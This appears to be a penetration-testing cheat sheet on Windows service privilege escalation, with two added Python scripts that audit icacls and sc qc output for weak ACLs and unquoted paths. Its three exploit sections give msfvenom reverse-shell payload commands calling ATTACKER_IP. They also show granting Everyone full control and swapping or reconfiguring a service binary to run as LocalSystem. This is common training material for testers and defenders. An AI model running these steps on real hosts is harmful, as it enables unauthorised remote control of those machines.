Windows Services
Service Configuration Basics
Location of Service Configurations:
HKLM\SYSTEM\CurrentControlSet\Services\
Listing All Services:
sc query
1. Insecure Permissions on Service Executable
Steps to Exploit:
Find the Service Executable:
sc qc <SERVICE_NAME>
Check Permissions on the Executable:
icacls <EXECUTABLE_PATH>
Exploitation Steps (if the user can modify the executable):
Create a Malicious Payload:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o <SERVICE_EXECUTABLE>
Grant Full Permissions (if needed):
icacls <SERVICE_EXECUTABLE> /grant Everyone:F
Trigger the Service:
sc stop <SERVICE_NAME>
sc start <SERVICE_NAME>
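The permission check in the step above is easier to reason about when the `icacls` output is parsed rather than read by eye. The following is an added example (not code from the original page): it parses `icacls` output for the service executable and reports any ACE that grants a write-class right to a group every ordinary user belongs to. The sample output and path are constructed; the set of write-class rights and the list of low-privilege principals are the author's choices for this example, not an exhaustive list.

```python
import re
from typing import Dict, List

# Path queried with icacls and a constructed sample of its output; neither is
# captured from a real host.
SAMPLE_PATH = r"C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe"
SAMPLE_ICACLS = r"""
C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                     BUILTIN\Administrators:(I)(F)
                                                     BUILTIN\Users:(I)(M)
                                                     Everyone:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# icacls rights that allow the file's contents, DACL or owner to be changed
# (simple rights F/M/W plus the specific rights that imply writing).
WRITE_RIGHTS = {"F", "M", "W", "GA", "GW", "WD", "AD", "WEA", "WA", "DE", "WDAC", "WO"}

# Groups that every ordinary interactive or authenticated user belongs to
# (an assumed, deliberately short list for this example).
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

# "<principal>:(tok)(tok)..." at the end of a line; the principal may contain spaces.
_ACE = re.compile(r"^\s*(.+?):((?:\([^)]*\))+)\s*$")


def parse_icacls(output: str, path: str) -> List[Dict[str, object]]:
    """Return one {principal, rights} entry per ACE printed by icacls."""
    aces: List[Dict[str, object]] = []
    for line in output.splitlines():
        if line.startswith(path):
            line = line[len(path):]  # the first line carries the path before its ACE
        m = _ACE.match(line)
        if not m:
            continue  # blank line or the trailing summary line
        tokens = re.findall(r"\(([^)]*)\)", m.group(2))
        # Specific rights are printed comma-separated inside one pair of parentheses.
        rights = [r.strip() for tok in tokens for r in tok.split(",")]
        aces.append({"principal": m.group(1).strip(), "rights": rights})
    return aces


def weak_write_aces(aces: List[Dict[str, object]]) -> List[str]:
    """Principals that ordinary users map to and that hold a write-class right."""
    findings: List[str] = []
    for ace in aces:
        rights = set(ace["rights"])
        if "DENY" in rights:
            continue  # a deny ACE grants nothing
        if ace["principal"].lower() in LOW_PRIV_PRINCIPALS and rights & WRITE_RIGHTS:
            findings.append(ace["principal"])
    return findings


if __name__ == "__main__":
    entries = parse_icacls(SAMPLE_ICACLS, SAMPLE_PATH)
    for principal in weak_write_aces(entries):
        print(f"{SAMPLE_PATH}: writable by {principal}")
```

Run this against the real output of `icacls <EXECUTABLE_PATH>` by substituting the captured text and the queried path; the queried path must be passed in because `icacls` prints it in front of the first ACE and the path itself may contain spaces.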
2. Unquoted Service Path Vulnerability
Description:
This vulnerability arises when the executable path of a service is not quoted and contains spaces.
How It Works:
When the path is not quoted, the Service Control Manager (SCM) cannot tell where the executable name ends and its arguments begin, so it tries each space-delimited prefix of the path in turn, appending .exe, and runs the first file it finds.
Example Path:
C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
Search Order:
C:\MyPrograms\Disk.exe
C:\MyPrograms\Disk Sorter.exe
C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
(the intended executable, tried last)
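The search order above is one instance of a general rule, and an administrator auditing a host wants it applied to every service's BINARY_PATH_NAME. The following is an added example (not code from the original page): it parses `sc qc` output, decides whether the path is unquoted and contains spaces, generates the candidate executables in the order the text describes, and lists the directories that must not be writable by ordinary users. The sample `sc qc` output is constructed, and the generation rule (append .exe when a prefix has no extension, stop at the first prefix that already names a .exe) is this example's reading of the behaviour the text describes.

```python
import ntpath
import re
from typing import Dict, List

# Constructed sample of `sc qc` output for the service in the text; not
# captured from a real host.
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: disksorter
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Disk Sorter Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

# "FIELD_NAME : value" lines; the value may itself contain a colon (C:\...).
_FIELD = re.compile(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$")


def parse_sc_qc(text: str) -> Dict[str, str]:
    """Turn `sc qc` output into a FIELD -> value mapping."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        m = _FIELD.match(line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def is_unquoted_with_spaces(bin_path: str) -> bool:
    """True when the path is not wrapped in quotes and contains a space."""
    p = bin_path.strip()
    return bool(p) and not p.startswith('"') and " " in p


def scm_candidates(bin_path: str) -> List[str]:
    """Executables tried, in order, when an unquoted binPath contains spaces.

    Each space-delimited prefix is tried in turn; ".exe" is appended when the
    prefix's last component has no extension. Generation stops at the first
    prefix that already names a .exe, which is the intended executable.
    (Assumed rule for this example; it reproduces the order given in the text.)
    """
    tokens = bin_path.strip().split(" ")
    candidates: List[str] = []
    if not tokens[0]:
        return candidates
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        _, ext = ntpath.splitext(ntpath.basename(prefix))
        candidates.append(prefix if ext else prefix + ".exe")
        if ext.lower() == ".exe":
            break
    return candidates


def audit_service(sc_qc_output: str) -> Dict[str, object]:
    """Flag an unquoted service path and list the directories an
    administrator must confirm are not writable by ordinary users."""
    fields = parse_sc_qc(sc_qc_output)
    bin_path = fields.get("BINARY_PATH_NAME", "")
    unquoted = is_unquoted_with_spaces(bin_path)
    candidates = scm_candidates(bin_path) if unquoted else []
    dirs: List[str] = []
    for c in candidates[:-1]:  # every candidate except the intended executable
        d = ntpath.dirname(c)
        if d not in dirs:
            dirs.append(d)
    return {
        "name": fields.get("SERVICE_NAME", ""),
        "account": fields.get("SERVICE_START_NAME", ""),
        "bin_path": bin_path,
        "unquoted": unquoted,
        "candidates": candidates,
        "dirs_to_check": dirs,
    }


if __name__ == "__main__":
    for key, value in audit_service(SAMPLE_SC_QC).items():
        print(f"{key}: {value}")
```

Feeding the captured output of `sc qc <SERVICE_NAME>` for each name from `sc query` gives a per-service list; the fix on the service side is to quote the path (`sc config <SERVICE_NAME> binPath= "\"C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe\""`), and `dirs_to_check` tells the administrator which directories' ACLs to review with `icacls` in the meantime.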
Exploitation Steps:
Create a Malicious Binary:
Name it to match a higher-priority path (e.g., C:\MyPrograms\Disk.exe).
Upload and Trigger the Binary:
Restart the service to run the malicious binary:
sc stop <SERVICE_NAME>
sc start <SERVICE_NAME>
3. Insecure Service Permissions
Description:
This vulnerability occurs when a user can modify the service configuration.
Steps to Exploit:
Check Service Configuration Rights:
accesschk64.exe -qlc <SERVICE_NAME>
Note: download accesschk from Sysinternals.
Create a Malicious Payload:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4447 -f exe-service -o <EXECUTABLE>
Grant Full Permissions on the Payload:
icacls <EXECUTABLE> /grant Everyone:F
Modify the Service Configuration:
sc config <SERVICE_NAME> binPath= "<EXECUTABLE>" obj= LocalSystem
Trigger the Service:
sc stop <SERVICE_NAME>
sc start <SERVICE_NAME>